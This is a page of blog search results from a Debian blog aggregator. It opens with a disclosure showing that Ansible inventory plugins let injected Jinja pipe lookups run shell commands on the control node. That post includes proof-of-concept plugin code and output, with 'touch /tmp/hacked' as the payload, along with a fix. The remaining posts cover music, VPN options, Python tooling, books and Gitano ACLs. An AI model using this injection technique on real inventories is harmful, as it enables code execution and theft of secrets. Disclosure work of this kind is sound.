Search Results: "dsw"

11 March 2024

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now. TL;DR Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it. Inventory plugins Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman. For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object. And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell. Let that sink in for a moment, and then we'll look at an example. Example inventory plugin
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '  lookup("pipe", "touch /tmp/hacked" )  ')
The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:
  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory
In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar. The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host. Using the example inventory plugin Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from). And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need. If we now call ansible-inventory, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
 
    "_meta":  
        "hostvars":  
            "exploit.example.com":  
                "ansible_connection": "local",
                "something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
             
         
     ,
    "all":  
        "children": [
            "ungrouped"
        ]
     ,
    "ungrouped":  
        "hosts": [
            "exploit.example.com"
        ]
     
 
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.) So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string. Executing a playbook, interpreting Jinja To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM. Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!
- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]
This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]
TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] =>  
    "hostvars[inventory_hostname]":  
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
         
        "something_funny": ""
     
 
PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was lookup("pipe", "touch /tmp/hacked" ) and touch does not return anything. But it did create the file!
% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/ . Why is this possible? This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it. In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:
from ansible.utils.unsafe_proxy import wrap_var
 
self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('  lookup("pipe", "touch /tmp/hacked" )  '))
Which then gets rendered as a string when dumping the variables using debug:
"something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
But it seems inventories don't do this:
for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)
(aws_ec2.py)
for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)
(hcloud.py)
for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
(foreman.py) And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe". Can something similar happen in other parts of Ansible? It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481 But even if we only look at inventories, add_host(host) can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol  lookup("pipe", "touch /tmp/hacked-host" )  ')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
fatal: [lol  lookup("pipe", "touch /tmp/hacked-host" )  ]: UNREACHABLE! =>  "changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true 
PLAY RECAP ************************************************************************************************
lol  lookup("pipe", "touch /tmp/hacked-host" )   : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0
% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
Affected versions I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

9 January 2024

Louis-Philippe V ronneau: 2023 A Musical Retrospective

I ended 2022 with a musical retrospective and very much enjoyed writing that blog post. As such, I have decided to do the same for 2023! From now on, this will probably be an annual thing :) Albums In 2023, I added 73 new albums to my collection nearly 2 albums every three weeks! I listed them below in the order in which I acquired them. I purchased most of these albums when I could and borrowed the rest at libraries. If you want to browse though, I added links to the album covers pointing either to websites where you can buy them or to Discogs when digital copies weren't available. Once again this year, it seems that Punk (mostly O !) and Metal dominate my list, mostly fueled by Angry Metal Guy and the amazing Montr al Skinhead/Punk concert scene. Concerts A trend I started in 2022 was to go to as many concerts of artists I like as possible. I'm happy to report I went to around 80% more concerts in 2023 than in 2022! Looking back at my list, April was quite a busy month... Here are the concerts I went to in 2023: Although metalfinder continues to work as intended, I'm very glad to have discovered the Montr al underground scene has departed from Facebook/Instagram and adopted en masse Gancio, a FOSS community agenda that supports ActivityPub. Our local instance, askapunk.net is pretty much all I could ask for :) That's it for 2023!

31 March 2023

Enrico Zini: Things I learnt in March 2023

About JACK and Debian

28 October 2022

Antoine Beaupr : Debating VPN options

In my home lab(s), I have a handful of machines spread around a few points of presence, with mostly residential/commercial cable/DSL uplinks, which means, generally, NAT. This makes monitoring those devices kind of impossible. While I do punch holes for SSH, using jump hosts gets old quick, so I'm considering adding a virtual private network (a "VPN", not a VPN service) so that all machines can be reachable from everywhere. I see three ways this can work:
  1. a home-made Wireguard VPN, deployed with Puppet
  2. a Wireguard VPN overlay, with Tailscale or equivalent
  3. IPv6, native or with tunnels
So which one will it be?

Wireguard Puppet modules As is (unfortunately) typical with Puppet, I found multiple different modules to talk with Wireguard.
module score downloads release stars watch forks license docs contrib issue PR notes
halyard 3.1 1,807 2022-10-14 0 0 0 MIT no requires firewall and Configvault_Write modules?
voxpupuli 5.0 4,201 2022-10-01 2 23 7 AGPLv3 good 1/9 1/4 1/61 optionnally configures ferm, uses systemd-networkd, recommends systemd module with manage_systemd to true, purges unknown keys
abaranov 4.7 17,017 2021-08-20 9 3 38 MIT okay 1/17 4/7 4/28 requires pre-generated private keys
arrnorets 3.1 16,646 2020-12-28 1 2 1 Apache-2 okay 1 0 0 requires pre-generated private keys?
The voxpupuli module seems to be the most promising. The abaranov module is more popular and has more contributors, but it has more open issues and PRs. More critically, the voxpupuli module was written after the abaranov author didn't respond to a PR from the voxpupuli author trying to add more automation (namely private key management). It looks like setting up a wireguard network would be as simple as this on node A:
wireguard::interface   'wg0':
  source_addresses => ['2003:4f8:c17:4cf::1', '149.9.255.4'],
  public_key       => $facts['wireguard_pubkeys']['nodeB'],
  endpoint         => 'nodeB.example.com:53668',
  addresses        => [ 'Address' => '192.168.123.6/30', , 'Address' => 'fe80::beef:1/64' ,],
 
This configuration come from this pull request I sent to the module to document how to use that fact. Note that the addresses used here are examples that shouldn't be reused and do not confirm to RFC5737 ("IPv4 Address Blocks Reserved for Documentation", 192.0.2.0/24 (TEST-NET-1), 198.51.100.0/24 (TEST-NET-2), and 203.0.113.0/24 (TEST-NET-3)) or RFC3849 ("IPv6 Address Prefix Reserved for Documentation", 2001:DB8::/32), but that's another story. (To avoid boostrapping problems, the resubmit-facts configuration could be used so that other nodes facts are more immediately available.) One problem with the above approach is that you explicitly need to take care of routing, network topology, and addressing. This can get complicated quickly, especially if you have lots of devices, behind NAT, in multiple locations (which is basically my life at home, unfortunately). Concretely, basic Wireguard only support one peer behind NAT. There are some workarounds for this, but they generally imply a relay server of some sort, or some custom registry, it's kind of a mess. And this is where overlay networks like Tailscale come in.

Tailscale Tailscale is basically designed to deal with this problem. It's not fully opensource, but pretty close, and they have an interesting philosophy behind that. The client is opensource, and there is an opensource version of the server side, called headscale. They have recently (late 2022) hired the main headscale developer while promising to keep supporting it, which is pretty amazing. Tailscale provides an overlay network based on Wireguard, where each peer basically has a peer-to-peer encrypted connexion, with automatic key rotation. They also ship a multitude of applications and features on top of that like file sharing, keyless SSH access, and so on. The authentication layer is based on an existing SSO provider, you don't just register with Tailscale with new account, you login with Google, Microsoft, or GitHub (which, really, is still Microsoft). The Headscale server ships with many features out of that:
  • Full "base" support of Tailscale's features
  • Configurable DNS
    • Split DNS
    • MagicDNS (each user gets a name)
  • Node registration
    • Single-Sign-On (via Open ID Connect)
    • Pre authenticated key
  • Taildrop (File Sharing)
  • Access control lists
  • Support for multiple IP ranges in the tailnet
  • Dual stack (IPv4 and IPv6)
  • Routing advertising (including exit nodes)
  • Ephemeral nodes
  • Embedded DERP server (AKA NAT-to-NAT traversal)
Neither project (client or server) is in Debian (RFP 972439 for the client, none filed yet for the server), which makes deploying this for my use case rather problematic. Their install instructions are basically a curl bash but they also provide packages for various platforms. Their Debian install instructions are surprisingly good, and check most of the third party checklist we're trying to establish. (It's missing a pin.) There's also a Puppet module for tailscale, naturally. What I find a little disturbing with Tailscale is that you not only need to trust Tailscale with authorizing your devices, you also basically delegate that trust also to the SSO provider. So, in my case, GitHub (or anyone who compromises my account there) can penetrate the VPN. A little scary. Tailscale is also kind of an "all or nothing" thing. They have MagicDNS, file transfers, all sorts of things, but those things require you to hook up your resolver with Tailscale. In fact, Tailscale kind of assumes you will use their nameservers, and have suffered great lengths to figure out how to do that. And naturally, here, it doesn't seem to work reliably; my resolv.conf somehow gets replaced and the magic resolution of the ts.net domain fails. (I wonder why we can't opt in to just publicly resolve the ts.net domain. I don't care if someone can enumerate the private IP addreses or machines in use in my VPN, at least I don't care as much as fighting with resolv.conf everywhere.) Because I mostly have access to the routers on the networks I'm on, I don't think I'll be using tailscale in the long term. But it's pretty impressive stuff: in the time it took me to even review the Puppet modules to configure Wireguard (which is what I'll probably end up doing), I was up and running with Tailscale (but with a broken DNS, naturally). (And yes, basic Wireguard won't bring me DNS either, but at least I won't have to trust Tailscale's Debian packages, and Tailscale, and Microsoft, and GitHub with this thing.)

IPv6 IPv6 is actually what is supposed to solve this. Not NAT port forwarding crap, just real IPs everywhere. The problem is: even though IPv6 adoption is still growing, it's kind of reaching a plateau at around 40% world-wide, with Canada lagging behind at 34%. It doesn't help that major ISPs in Canada (e.g. Bell Canada, Videotron) don't care at all about IPv6 (e.g. Videotron in beta since 2011). So we can't rely on those companies to do the right thing here. The typical solution here is often to use a tunnel like HE's tunnelbroker.net. It's kind of tricky to configure, but once it's done, it works. You get end-to-end connectivity as long as everyone on the network is on IPv6. And that's really where the problem lies here; the second one of your nodes can't setup such a tunnel, you're kind of stuck and that tool completely breaks down. IPv6 tunnels also don't give you the kind of security a VPN provides as well, naturally. The other downside of a tunnel is you don't really get peer-to-peer connectivity: you go through the tunnel. So you can expect higher latencies and possibly lower bandwidth as well. Also, HE.net doesn't currently charge for this service (and they've been doing this for a long time), but this could change in the future (just like Tailscale, that said). Concretely, the latency difference is rather minimal, Google:
--- ipv6.l.google.com ping statistics ---
10 packets transmitted, 10 received, 0,00% packet loss, time 136,8ms
RTT[ms]: min = 13, median = 14, p(90) = 14, max = 15
--- google.com ping statistics ---
10 packets transmitted, 10 received, 0,00% packet loss, time 136,0ms
RTT[ms]: min = 13, median = 13, p(90) = 14, max = 14
In the case of GitHub, latency is actually lower, interestingly:
--- ipv6.github.com ping statistics ---
10 packets transmitted, 10 received, 0,00% packet loss, time 134,6ms
RTT[ms]: min = 13, median = 13, p(90) = 14, max = 14
--- github.com ping statistics ---
10 packets transmitted, 10 received, 0,00% packet loss, time 293,1ms
RTT[ms]: min = 29, median = 29, p(90) = 29, max = 30
That is because HE.net peers directly with my ISP and Fastly (which is behind GitHub.com's IPv6, apparently?), so it's only 6 hops away. While over IPv4, the ping goes over New York, before landing AWS's Ashburn, Virginia datacenters, for a whopping 13 hops... I managed setup a HE.net tunnel at home, because I also need IPv6 for other reasons (namely debugging at work). My first attempt at setting this up in the office failed, but now that I found the openwrt.org guide, it worked... for a while, and I was able to produce the above, encouraging, mini benchmarks. Unfortunately, a few minutes later, IPv6 just went down again. And the problem with that is that many programs (and especially OpenSSH) do not respect the Happy Eyeballs protocol (RFC 8305), which means various mysterious "hangs" at random times on random applications. It's kind of a terrible user experience, on top of breaking the one thing it's supposed to do, of course, which is to give me transparent access to all the nodes I maintain. Even worse, it would still be a problem for other remote nodes I might setup where I might not have acess to the router to setup the tunnel. It's also not absolutely clear what happens if you setup the same tunnel in two places... Presumably, something is smart enough to distribute only a part of the /48 block selectively, but I don't really feel like going that far, considering how flaky the setup is already.

Other options If this post sounds a little biased towards IPv6 and Wireguard, it's because it is. I would like everyone to migrate to IPv6 already, and Wireguard seems like a simple and sound system. I'm aware of many other options to make VPNs. So before anyone jumps in and says "but what about...", do know that I have personnally experimented with:
  • tinc: nice, automatic meshing, used for the Montreal mesh, serious design flaws in the crypto that make it generally unsafe to use; supposedly, v1.1 (or 2.0?) will fix this, but that's been promised for over a decade by now
  • ipsec, specifically strongswan: hard to configure (especially configure correctly!), harder even to debug, otherwise really nice because transparent (e.g. no need for special subnets), used at work, but also considering a replacement there because it's a major barrier to entry to train new staff
  • OpenVPN: mostly used as a client for [VPN service][]s like Riseup VPN or Mullvad, mostly relevant for client-server configurations, not really peer-to-peer, shared secrets or TLS, kind of an hassle to maintain, see also SoftEther for an alternative implementation
All of those solutions have significant problems and I do not wish to use any of those for this project. Also note that Tailscale is only one of many projects laid over Wireguard to do that kind of thing, see this LWN review for others (basically NetbBird, Firezone, and Netmaker).

Future work Those are options that came up after writing this post, and might warrant further examination in the future.
  • Meshbird, a "distributed private networking" with little information about how it actually works other than "encrypted with strong AES-256"
  • Nebula, "A scalable overlay networking tool with a focus on performance, simplicity and security", written by Slack people to replace IPsec, docs, runs as an overlay for Slack's 50k node network, only packaged in Debian experimental, lagging behind upstream (1.4.0, from May 2021 vs upstream's 1.6.1 from September 2022), requires a central CA, Golang, I'm in "wait and see" mode for now
  • n2n: "layer two VPN", seems packaged in Debian but inactive
  • ouroboros: "peer-to-peer packet network prototype", sounds and seems complicated
  • QuickTUN is interesting because it's just a small wrapper around NaCL, and it's in Debian... but maybe too obscure for my own good
  • unetd: Wireguard-based full mesh networking from OpenWRT, not in Debian
  • vpncloud: "high performance peer-to-peer mesh VPN over UDP supporting strong encryption, NAT traversal and a simple configuration", sounds interesting, not in Debian
  • Yggdrasil: actually a pretty good match for my use case, but I didn't think of it when starting the experiments here; packaged in Debian, with the Golang version planned, Puppet module; major caveat: nodes exposed publicly inside the global mesh unless configured otherwise (firewall suggested), requires port forwards, alpha status

Conclusion Right now, I'm going to deploy Wireguard tunnels with Puppet. It seems like kind of a pain in the back, but it's something I will be able to reuse for work, possibly completely replacing strongswan. I have another Puppet module for IPsec which I was planning to publish, but now I'm thinking I should just abort that and replace everything with Wireguard, assuming we still need VPNs at work in the future. (I have a number of reasons to believe we might not need any in the near future anyways...)

22 October 2021

Enrico Zini: Scanning for imports in Python scripts

I had to package a nontrivial Python codebase, and I needed to put dependencies in setup.py. I could do git grep -h import sort -u, then review the output by hand, but I lacked the motivation for it. Much better to take a stab at solving the general problem The result is at https://github.com/spanezz/python-devel-tools. One fun part is scanning a directory tree, using ast to find import statements scattered around the code:
class Scanner:
    def __init__(self):
        self.names: Set[str] = set()
    def scan_dir(self, root: str):
        for dirpath, dirnames, filenames, dir_fd in os.fwalk(root):
            for fn in filenames:
                if fn.endswith(".py"):
                    with dirfd_open(fn, dir_fd=dir_fd) as fd:
                        self.scan_file(fd, os.path.join(dirpath, fn))
                st = os.stat(fn, dir_fd=dir_fd)
                if st.st_mode & (stat.S_IXUSR   stat.S_IXGRP   stat.S_IXOTH):
                    with dirfd_open(fn, dir_fd=dir_fd) as fd:
                        try:
                            lead = fd.readline()
                        except UnicodeDecodeError:
                            continue
                        if re_python_shebang.match(lead):
                            fd.seek(0)
                            self.scan_file(fd, os.path.join(dirpath, fn))
    def scan_file(self, fd: TextIO, pathname: str):
        log.info("Reading file %s", pathname)
        try:
            tree = ast.parse(fd.read(), pathname)
        except SyntaxError as e:
            log.warning("%s: file cannot be parsed", pathname, exc_info=e)
            return
        self.scan_tree(tree)
    def scan_tree(self, tree: ast.AST):
        for stm in tree.body:
            if isinstance(stm, ast.Import):
                for alias in stm.names:
                    if not isinstance(alias.name, str):
                        print("NAME", repr(alias.name), stm)
                    self.names.add(alias.name)
            elif isinstance(stm, ast.ImportFrom):
                if stm.module is not None:
                    self.names.add(stm.module)
            elif hasattr(stm, "body"):
                self.scan_tree(stm)
Another fun part is grouping the imported module names by where in sys.path they have been found:
    scanner = Scanner()
    scanner.scan_dir(args.dir)
    sys.path.append(args.dir)
    by_sys_path: Dict[str, List[str]] = collections.defaultdict(list)
    for name in sorted(scanner.names):
        spec = importlib.util.find_spec(name)
        if spec is None or spec.origin is None:
            by_sys_path[""].append(name)
        else:
            for sp in sys.path:
                if spec.origin.startswith(sp):
                    by_sys_path[sp].append(name)
                    break
            else:
                by_sys_path[spec.origin].append(name)
    for sys_path, names in sorted(by_sys_path.items()):
        print(f" sys_path or 'unidentified' :")
        for name in names:
            print(f"   name ")
An example. It's kind of nice how it can at least tell apart stdlib modules so one doesn't need to read through those:
$ ./scan-imports  /himblick
unidentified:
  changemonitor
  chroot
  cmdline
  mediadir
  player
  server
  settings
  static
  syncer
  utils
 /himblick:
  himblib.cmdline
  himblib.host_setup
  himblib.player
  himblib.sd
/usr/lib/python3.9:
  __future__
  argparse
  asyncio
  collections
  configparser
  contextlib
  datetime
  io
  json
  logging
  mimetypes
  os
  pathlib
  re
  secrets
  shlex
  shutil
  signal
  subprocess
  tempfile
  textwrap
  typing
/usr/lib/python3/dist-packages:
  asyncssh
  parted
  progressbar
  pyinotify
  setuptools
  tornado
  tornado.escape
  tornado.httpserver
  tornado.ioloop
  tornado.netutil
  tornado.web
  tornado.websocket
  yaml
built-in:
  sys
  time
Maybe such a tool already exists and works much better than this? From a quick search I didn't find it, and it was fun to (re)invent it. Updates: Jakub Wilk pointed out to an old python-modules script that finds Debian dependencies. The AST scanning code should be refactored to use ast.NodeVisitor.

23 July 2021

Bits from Debian: New Debian Developers and Maintainers (May and June 2021)

The following contributors got their Debian Developer accounts in the last two months: The following contributors were added as Debian Maintainers in the last two months: Congratulations!

6 November 2017

Jonathan Dowland: Coil

Peter Christopherson and Jhonn Balance, from [Santa Sangre](https://santasangremagazine.wordpress.com/2014/11/16/the-angelic-conversation-in-remembrance-of-coil/) Peter Christopherson and Jhonn Balance, from Santa Sangre
A friend asked me to suggest five tracks by Coil that gave an introduction to their work. Trying to summarize Coil in 5 tracks is tough. I think it's probably impossible to fairly summarize Coil with any subset of their music, for two reasons. Firstly, their music was the output of their work but I don't think is really the whole of the work itself. There's a real mystique around them. They were deeply interested in arcania, old magic, Aleister Crowley, scatology; they were both openly and happily gay and their work sometimes explored their experiences in various related underground scenes and sub-cultures; they lost friends to HIV/AIDS and that had a profound impact on them. They had a big influence on some people who discovered them who were exploring their own sexualities at the time and might have felt excluded from mainstream society. They frequently explored drugs, meditation and other ways to try to expand and open their minds; occultism. They were also fiercely anti-commercial, their stuff was released in limited quantities across a multitude of different music labels, often under different names, and often paired with odd physical objects, runes, vials of blood, etc. Later fascinations included paganism and moon worship. I read somewhere that they literally cursed one of their albums. Secondly, part of their "signature" was the lack of any consistency in their work, or to put it another way, their style over time varied enormously. I'm also not necessarily well-versed in all their stuff, I'm part way on this journey myself... but these are tracks which stand out at least from the subset I've listened to. Both original/core members of Coil have passed away and the legal status of their catalogue is in a state of limbo. Some of these songs are available on currently-in-print releases, but all such releases are under dispute by some associate or other.

1. Heaven's Blade Like (probably) a lot of Coil songs, this one exists in multiple forms, with some dispute about which are canonical, which are officially sanctioned, etc. the video linked above actually contains 5 different versions, but I've linked to a time offset to the 4th: "Heaven's Blade (Backwards)". This version was the last to come to light with the recent release of "Backwards", an album originally prepared in the 90s at Trent Reznor's Nothing Studios in New Orleans, but not finished or released. The circumstances around its present-day release, as well as who did what to it and what manipulation may have been performed to the audio a long time after the two core members had passed, is a current topic in fan circles. Despite that, this is my preferred version. You can choose to investigate the others, or not, at your own discretion.

2. how to destroy angels (ritual music for the accumulation of male sexual energy) A few years ago, "guidopaparazzi", a user at the Echoing the Sound music message board attempted to listen to every Coil release ever made and document the process. He didn't do it chronologically, leaving the EPs until near the end, which is when he tackled this one (which was the first release by Coil, and was the inspiration behind the naming of Trent Reznor's one-time side project "How To Destroy Angels"). Guido seemed to think this was some kind of elaborate joke. Personally I think it's a serious piece and there's something to it but this just goes to show, different people can take things in entirely different ways. Here's Guido's review, and you can find the rest of his reviews linked from that one if you wish. https://archive.org/details/Coil-HowToDestroyAngels1984

3. Red Birds Will Fly Out Of The East And Destroy Paris In A Night Both "Musick To Play In The Dark" volumes (one and two) are generally regarded as amongst the most accessible entry points to the Coil discography. This is my choice of cut from volume 1. For some reason this reminds me a little of some of the background music from the game "Unreal Tournament". I haven't played that in at least 15 years. I should go back and see if I can figure out why it does. The whole EP is worth a listen, especially at night. https://archive.org/details/CoilMusickToPlayInTheDarkVol1/Coil+-+Musick+To+Play+In+The+Dark+Vol+1+-+2+Red+Birds+Will+Fly+Out+Of+The+East+And+Destroy+Paris+In+A+Night.flac

4. Things Happen It's tricky to pick a track from either "Love's Secret Domain" or "Horse Rotorvator"; there are other choices which I think are better known and loved than this one but it's one that haunted me after I first heard it for one reason or another, so here it is.

5. The Anal Staircase Track 1 from Horse Rotorvator. What the heck is a Horse Rotorvator anyway? I think it was supposed to have been a lucid nightmare experienced by the vocalist Jhonn Balance. So here they wrote a song about anal sex. No messing about, no allusion particularly, but why should there be? https://archive.org/details/CoilHorseRotorvator2001Remaster/Coil+-+Horse+Rotorvator+%5B2001+remaster%5D+-+01+The+Anal+Staircase.flac

Bonus 6th: 7-Methoxy-B-Carboline (Telepathine) From the drone album "Time Machines", which has just been re-issued by DIAS records, who describe it as "authorized". Each track is titled by the specific combination of compounds that inspired its composition, supposedly. Or, perhaps it's a "recommended dosing" for listening along. https://archive.org/details/TimeMachines-TimeMachines

Post-script If those piqued your interest, there's some decent words and a list of album suggestions in this Vinyl Factory article. Finally, if you can track them down, Stuart Maconie had two radio shows about Coil on his "Freak Zone" programme. The main show discusses the release of "Backwards", including an interview with collaborator Danny Hyde, who was the main person behind the recent re-issue. The shorter show is entitled John Doran uncoils Coil. Guest John Doran from The Quietus discusses the group and their history interspersed with Coil tracks and tracks from their contemporaries. Interestingly they chose a completely different set of 5 tracks to me.

18 September 2017

Russ Allbery: Consolidation haul

My parents are less fond than I am of filling every available wall in their house with bookshelves and did a pruning of their books. A lot of them duplicated other things that I had, or didn't sound interesting, but I still ended up with two boxes of books (and now have to decide which of my books to prune, since I'm out of shelf space). Also included is the regular accumulation of new ebook purchases. Mitch Albom Tuesdays with Morrie (nonfiction)
Ilona Andrews Clean Sweep (sff)
Catherine Asaro Charmed Sphere (sff)
Isaac Asimov The Caves of Steel (sff)
Isaac Asimov The Naked Sun (sff)
Marie Brennan Dice Tales (nonfiction)
Captain Eric "Winkle" Brown Wings on My Sleeve (nonfiction)
Brian Christian & Tom Griffiths Algorithms to Live By (nonfiction)
Tom Clancy The Cardinal of the Kremlin (thriller)
Tom Clancy The Hunt for the Red October (thriller)
Tom Clancy Red Storm Rising (thriller)
April Daniels Sovereign (sff)
Tom Flynn Galactic Rapture (sff)
Neil Gaiman American Gods (sff)
Gary J. Hudson They Had to Go Out (nonfiction)
Catherine Ryan Hyde Pay It Forward (mainstream)
John Irving A Prayer for Owen Meany (mainstream)
John Irving The Cider House Rules (mainstream)
John Irving The Hotel New Hampshire (mainstream)
Lawrence M. Krauss Beyond Star Trek (nonfiction)
Lawrence M. Krauss The Physics of Star Trek (nonfiction)
Ursula K. Le Guin Four Ways to Forgiveness (sff collection)
Ursula K. Le Guin Words Are My Matter (nonfiction)
Richard Matheson Somewhere in Time (sff)
Larry Niven Limits (sff collection)
Larry Niven The Long ARM of Gil Hamilton (sff collection)
Larry Niven The Magic Goes Away (sff)
Larry Niven Protector (sff)
Larry Niven World of Ptavvs (sff)
Larry Niven & Jerry Pournelle The Gripping Hand (sff)
Larry Niven & Jerry Pournelle Inferno (sff)
Larry Niven & Jerry Pournelle The Mote in God's Eye (sff)
Flann O'Brien The Best of Myles (nonfiction)
Jerry Pournelle Exiles to Glory (sff)
Jerry Pournelle The Mercenary (sff)
Jerry Pournelle Prince of Mercenaries (sff)
Jerry Pournelle West of Honor (sff)
Jerry Pournelle (ed.) Codominium: Revolt on War World (sff anthology)
Jerry Pournelle & S.M. Stirling Go Tell the Spartans (sff)
J.D. Salinger The Catcher in the Rye (mainstream)
Jessica Amanda Salmonson The Swordswoman (sff)
Stanley Schmidt Aliens and Alien Societies (nonfiction)
Cecilia Tan (ed.) Sextopia (sff anthology)
Lavie Tidhar Central Station (sff)
Catherynne Valente Chicks Dig Gaming (nonfiction)
J.E. Zimmerman Dictionary of Classical Mythology (nonfiction) This is an interesting tour of a lot of stuff I read as a teenager (Asimov, Niven, Clancy, and Pournelle, mostly in combination with Niven but sometimes his solo work). I suspect I will no longer consider many of these books to be very good, and some of them will probably go back into used bookstores after I've re-read them for memory's sake, or when I run low on space again. But all those mass market SF novels were a big part of my teenage years, and a few (like Mote In God's Eye) I definitely want to read again. Also included is a random collection of stuff my parents picked up over the years. I don't know what to expect from a lot of it, which makes it fun to anticipate. Fall vacation is coming up, and with it a large amount of uninterrupted reading time.

8 July 2017

Daniel Silverstone: Gitano - Approaching Release - Access Control Changes

As mentioned previously I am working toward getting Gitano into Stretch. A colleague and friend of mine (Richard Maw) did a large pile of work on Lace to support what we are calling sub-defines. These let us simplify Gitano's ACL files, particularly for individual projects. In this posting, I'd like to cover what has changed with the access control support in Gitano, so if you've never used it then some of this may make little sense. Later on, I'll be looking at some better user documentation in conjunction with another friend of mine (Lars Wirzenius) who has promised to help produce a basic administration manual before Stretch is totally frozen.

Sub-defines With a more modern lace (version 1.3 or later) there is a mechanism we are calling 'sub-defines'. Previously if you wanted to write a ruleset which said something like "Allow Steve to read my repository" you needed:
define is_steve user exact steve
allow "Steve can read my repo" is_steve op_read
And, as you'd expect, if you also wanted to grant read access to Jeff then you'd need yet set of defines:
define is_jeff user exact jeff
define is_steve user exact steve
define readers anyof is_jeff is_steve
allow "Steve and Jeff can read my repo" readers op_read
This, while flexible (and still entirely acceptable) is wordy for small rulesets and so we added sub-defines to create this syntax:
allow "Steve and Jeff can read my repo" op_read [anyof [user exact jeff] [user exact steve]]
Of course, this is generally neater for simpler rules, if you wanted to add another user then it might make sense to go for:
define readers anyof [user exact jeff] [user exact steve] [user exact susan]
allow "My friends can read my repo" op_read readers
The nice thing about this sub-define syntax is that it's basically usable anywhere you'd use the name of a previously defined thing, they're compiled in much the same way, and Richard worked hard to get good error messages out from them just in case.

